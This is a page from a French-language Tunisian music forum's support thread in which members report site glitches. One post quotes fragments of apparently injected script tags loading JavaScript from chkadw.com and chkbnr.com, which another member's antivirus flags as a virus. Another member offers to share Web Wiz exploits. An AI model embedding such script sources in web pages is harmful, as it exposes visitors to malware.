|
Questions |
Post Reply | Page <1 678910 12> |
Author | |
hardoussa3
Loud Joined: 06 Mars 2007 Location: Sousse Status: Offline Points: 450 |
Post Options
Thanks(0)
|
pourquoi quand opethist ma cité dans le forum de DARKESTRAH apparait ses chose là ?!!
="http://www.chkadw.com/b.js"> < ="http://www.chkbnr.com/b.js"> < =".js"> Edited by hardoussa3 - 22 Juin 2008 at 15:27 |
|
Le Mystère, j'adore.
j'aime la franchise, même si ça blesse |
|
Sandman
V.I.P. Blacker than Darkness Joined: 19 Mai 2007 Location: Norway Status: Offline Points: 992 |
Post Options
Thanks(0)
|
c'est opethist qui t'a cité pas moi
sinon quand j'appuie sur la fléche pour lire le dernier message directement je me trouve toujours sur le dernier message de l'avant dérniére page...pour un topic avec une seule page ça va mais quand j'y appuie pour un topic de 2 page je me trouve dans la 1ére page...est-ce un probléme technique? Edited by Sandman - 22 Juin 2008 at 15:17 |
|
|
|
hardoussa3
Post Options
Thanks(0)
|
HS on
désoler pour la faute Sandman Hs off |
|
Le Mystère, j'adore.
|
JokeR SPiRituS
Band Member Saracens - Violonist Joined: 05 Septembre 2007 Location: Cemetery... Status: Offline Points: 469 |
Post Options
Thanks(0)
|
Je crois qu'il ya un probleme dans le forum..
Déja chez moi , sa s'ouvre trés mais trééés dificilement..
Et chaque fois que j'ouvre le forum , mon anti virus détecte un virus sous le nom de cela http://www.chkbnr.com/b.js comme a dit Hardoussa3
Donc , c'est a cause du forum ou sa vient de chez moi??
|
|
hardoussa3
Post Options
Thanks(0)
|
je pense pas que sa vient de chez toi
de ma part je détecte pas de virus quand j'ouvre le forum |
|
Le Mystère, j'adore.
|
Satch
Moderator Group Cool # 9 Joined: 18 Avril 2007 Location: Tunisia Status: Offline Points: 921 |
Post Options
Thanks(0)
|
C'est un problème qui va être résolu le plus tôt possible.
|
|
Animals Should Not Try To Act Like People..
|
|
hardoussa3
Post Options
Thanks(0)
|
ah o.k j'espère
|
|
Le Mystère, j'adore.
|
dethronedspirit
Medium Joined: 27 Décembre 2006 Location: Elba Status: Offline Points: 182 |
Post Options
Thanks(0)
|
Je craint qu'il y'a un sérieux probléme avec Web Wiz en générale (sites et forums)!!! Il y'as des exploits faites deja , je peux te les indiquer ainisi que les failles publiés (en ce qui concerne web wiz y compris le forum et le site de zanzana)!! (en Mp biensure)!! bref, sinon je crois qu'il faut traiter ça d'une façon plus rapide et intact. |
|
Gothicos
Band Member Saracens Joined: 11 Septembre 2006 Location: Wasted Valley Status: Offline Points: 1214 |
Post Options
Thanks(0)
|
En fait, pourquoi le fest de Tabarka n'as pas de sous forum comme celui de Jazz à Carthage et les autres?? J'allait créer un topic pour celui de cette année mais j'ai pas trouvé où le mettre
|
|
Satch
Moderator Group Cool # 9 Joined: 18 Avril 2007 Location: Tunisia Status: Offline Points: 921 |
Post Options
Thanks(0)
|
J'y avais pensé mais c'est à l'admin de le faire.
|
|
musikman
Band Member YRAM / Voices - bASS Joined: 27 Décembre 2006 Location: Tunisia Status: Offline Points: 291 |
Post Options
Thanks(0)
|
je n'ai pas changé mon image perso, l'avatar comment il est devenu comme ça? C'est pas le mien!
|
|
N'ai pas peur y'a des flics!! |
|
Satch
Post Options
Thanks(0)
|
Quand l'admin a fait migré le forum vers une autre version, tous les avatars ont disparu. Vous devez donc les uploader de nouveau.
|
|
|
|
musikman
Band Member YRAM / Voices - bASS Joined: 27 Décembre 2006 Location: Tunisia Status: Offline Points: 291 |
Post Options
Thanks(0)
|
comment ça se fait que mon ancienne image perso est reapparue je l'ai deja changéeocbn.mobi>
|
|
N'ai pas peur y'a des flics!! |
|
hardoussa3
Post Options
Thanks(0)
|
peut être car il y a quelque problème dans le forum ou car KBA a changé la version du forum vers la plus récente
Edited by hardoussa3 |
|
Le Mystère, j'adore.
|
Satch
Post Options
Thanks(0)
|
C'est à cause des problèmes que rencontre le forum.
|
|
|
|
dethronedspirit
Medium Joined: 27 Décembre 2006 Location: Elba Status: Offline Points: 182 |
Post Options
Thanks(0)
|
Bon y'en as au moins 20 messages qui m'ont était supprimée !! je peux savoir comment ils sont evaporés et pourquoi ?
Merci |
|
Satch
Post Options
Thanks(0)
|
Ce sont des messages d'anciens topics ou de topics fermés qui ne servent plus à grand chose. On a préféré les supprimer.
|
|
hardoussa3
Post Options
Thanks(0)
|
pourrais je savoir quelle sont les topic qui ont été effacer ?
wanna express myself est supprimer aussi ? (je le trouves pas ) |
|
Le Mystère, j'adore.
|
Sandman
V.I.P. Blacker than Darkness Joined: 19 Mai 2007 Location: Norway Status: Offline Points: 992 |
Post Options
Thanks(0)
|
c'est vrai il est passé ou wanna express myself? ou est ce que je vais demander au autres de vider leurs boites mps(et au fait,Trinity occupe toi de la tienne)
on dirait qu'il y'a eu des changement assez radicaux en mon absence,j'éspére que je ne vais pas étre trop dépaysé Edited by Sandman - 14 Juillet 2008 at 20:48 |
|
|
|
Master Amin
Band Member Gallows Pole - Chanteur Joined: 20 Mars 2007 Location: Utopia Status: Offline Points: 558 |
Post Options
Thanks(0)
|
J'ai un petit probleme ces derniers temps sur le forum. C'est la connection automatique, j'ai l'impression qu'elle ne marche plus tout le temps. Ce qui fait que parfois, je suis sur un topic donné, et je clique sur FORUM dans la barre du dessus, ca me déconnecte, et je dois donc me reconnecter.
Faudrait voir ca, je suis pas le seul apparament. |
|
Post Reply | Page <1 678910 12> |
Tweet
|
Forum Jump | Forum Permissions You cannot post new topics in this forum You cannot reply to topics in this forum You cannot delete your posts in this forum You cannot edit your posts in this forum You cannot create polls in this forum You cannot vote in polls in this forum |
ACCUEIL | NEWS | NETWORK | OUTILS | COPYRIGHTS |
|